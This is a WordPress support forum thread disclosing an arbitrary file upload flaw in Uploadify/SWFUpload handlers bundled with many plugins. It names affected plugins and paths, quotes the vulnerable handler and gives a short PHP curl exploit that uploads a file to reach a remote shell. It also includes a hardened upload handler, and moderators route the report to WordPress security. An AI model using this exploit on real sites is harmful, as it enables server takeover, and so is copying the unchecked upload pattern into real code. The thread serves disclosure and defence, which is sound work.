Support » Plugins and Hacks » UPLOADIFY AND SWFUPLOAD ARBITRARY FILE UPLOAD

UPLOADIFY AND SWFUPLOAD ARBITRARY FILE UPLOAD

  • In all plugins that contain this lib:

    -> js/swfupdate/js/upload.php
    -> upload/php.php
    -> includes/doajaxfileupload.php
    -> uploadify/uploadify.php

    and more…

    Ex vuln plugins:

    -> front-end-upload
    -> front-file-manager
    -> omni-secure-files

    Ex vuln code:

    <?php
    /**
     * upload.php
     *
     * Copyright 2009, Moxiecode Systems AB
     * Released under GPL License.
     *
     * License: http://www.plupload.com/license
     * Contributing: http://www.plupload.com/contributing
     */
    
    // HTTP headers for no cache etc
    header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
    header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Cache-Control: post-check=0, pre-check=0", false);
    header("Pragma: no-cache");
    
    // we need these WP files to grab our destination dir
    ob_start();
    require_once( preg_replace( "/wp-content.*/","wp-load.php", __FILE__ ) );
    require_once( preg_replace( "/wp-content.*/","/wp-admin/includes/admin.php", __FILE__ ) );
    ob_end_clean();
    
    // Settings
    //$targetDir = ini_get("upload_tmp_dir") . DIRECTORY_SEPARATOR . "plupload";
    $targetDir = FEU_DESTINATION_DIR;
    [...]

    Exploit code:

    <?php
    $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
    $c = curl_init("http://site.com/PLUGIN-NAME/uploads/uploadify.php");
    curl_setopt($c, CURLOPT_POST, true);
    curl_setopt($c, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$u"));
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $e = curl_exec($c);
    curl_close($c);
    echo $e;
    ?>

    Remote shell “shell.php” is then accessible from the upload or temp folder.
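What the handlers listed above lack is any check between "a POST arrived" and "write the file to disk": no login, no nonce, no capability check, and no type allowlist, so a .php file lands in a web-reachable directory. The following is an added example of a hardened equivalent, written for this thread and not taken from any of the plugins named in it. It assumes a WordPress plugin context, and the AJAX action name `feu_secure_upload`, the nonce action `feu_upload` and the field name `Filedata` are illustrative choices; the WordPress functions used (`check_ajax_referer`, `current_user_can`, `wp_check_filetype_and_ext`, `wp_handle_upload`, `wp_send_json_*`) are real core APIs.

```php
<?php
/*
 * Hardened upload handler (added example; not any plugin's own code).
 * Assumptions: runs inside a WordPress plugin and is registered on the
 * wp_ajax_* hook, so only logged-in users can reach it. The action name
 * "feu_secure_upload", nonce action "feu_upload" and field "Filedata"
 * are illustrative.
 */

// Refuse direct HTTP requests to this file. It must be loaded by WordPress,
// never hit at wp-content/plugins/<name>/uploadify.php like the vulnerable handlers.
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

// Only the authenticated hook is registered. With no matching
// wp_ajax_nopriv_ hook, anonymous POSTs to admin-ajax.php never reach the handler.
add_action( 'wp_ajax_feu_secure_upload', 'feu_secure_upload_handler' );

/**
 * Allowlist of what this feature actually needs. Everything else,
 * including .php, .phtml and .htaccess, is rejected before the file
 * is moved out of PHP's temporary directory.
 */
function feu_allowed_mimes() {
    return array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
        'pdf'      => 'application/pdf',
    );
}

function feu_secure_upload_handler() {
    // 1. CSRF check: the request must carry a nonce issued to this user
    //    (sent as the "nonce" request parameter).
    check_ajax_referer( 'feu_upload', 'nonce' );

    // 2. Authorization: being logged in is not enough; require the capability.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    if ( empty( $_FILES['Filedata'] ) || ! is_array( $_FILES['Filedata'] ) ) {
        wp_send_json_error( array( 'message' => 'no file' ), 400 );
    }
    $file = $_FILES['Filedata'];
    if ( (int) $file['error'] !== UPLOAD_ERR_OK || ! is_uploaded_file( $file['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'upload failed' ), 400 );
    }

    // 3. Type check on both the extension and the file's actual content,
    //    restricted to our allowlist rather than the site-wide mime list.
    $mimes = feu_allowed_mimes();
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( array( 'message' => 'file type not permitted' ), 415 );
    }
    // Use the name WordPress considers correct for the detected content
    // (e.g. a mislabeled image), never the client-supplied name as-is.
    if ( ! empty( $check['proper_filename'] ) ) {
        $file['name'] = $check['proper_filename'];
    }

    // 4. Let WordPress move the file: it sanitizes the filename, picks a
    //    unique name under wp-content/uploads and re-applies the mime allowlist.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload(
        $file,
        array(
            'test_form' => false, // this is not the core media form
            'mimes'     => $mimes,
        )
    );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => $result['error'] ), 400 );
    }

    // Return only the public URL; the filesystem path is not the client's business.
    wp_send_json_success( array( 'url' => $result['url'] ) );
}
```

The client side POSTs to `wp-admin/admin-ajax.php` with `action=feu_secure_upload`, a `nonce` value produced by `wp_create_nonce( 'feu_upload' )`, and the file in `Filedata`. Compared with the handler quoted in the post, the four gates (hook that requires a session, nonce, capability, content-based allowlist) each independently stop the curl request shown above. As defence in depth, also configure the web server not to execute scripts from the uploads directory, so that a future bug in any upload handler yields a stored file rather than a remote shell.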

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator Jan Dembowski

    @jdembowski

    Brute Squad and Volunteer Moderator

    I’ve not been able to locate those plugins (I blame a lack of sleep).

    If that’s from plugins that are hosted in the WordPress repository, can you email the details to plugins AT wordpress.org or security AT wordpress.org?

    As with other vulnerable software (think timthumb) that’s a very serious issue.

    I just sent you a mail

    Moderator Jan Dembowski

    @jdembowski

    Brute Squad and Volunteer Moderator

    It’s not me as I’m not on either of those teams, but thank you. Informing the correct people is appreciated. 😉

    Sure

    Lots of the most-used plugins are concerned (> 100).

    I’ve updated Front End Upload to close this issue with that plugin.

  • The topic ‘UPLOADIFY AND SWFUPLOAD ARBITRARY FILE UPLOAD’ is closed to new replies.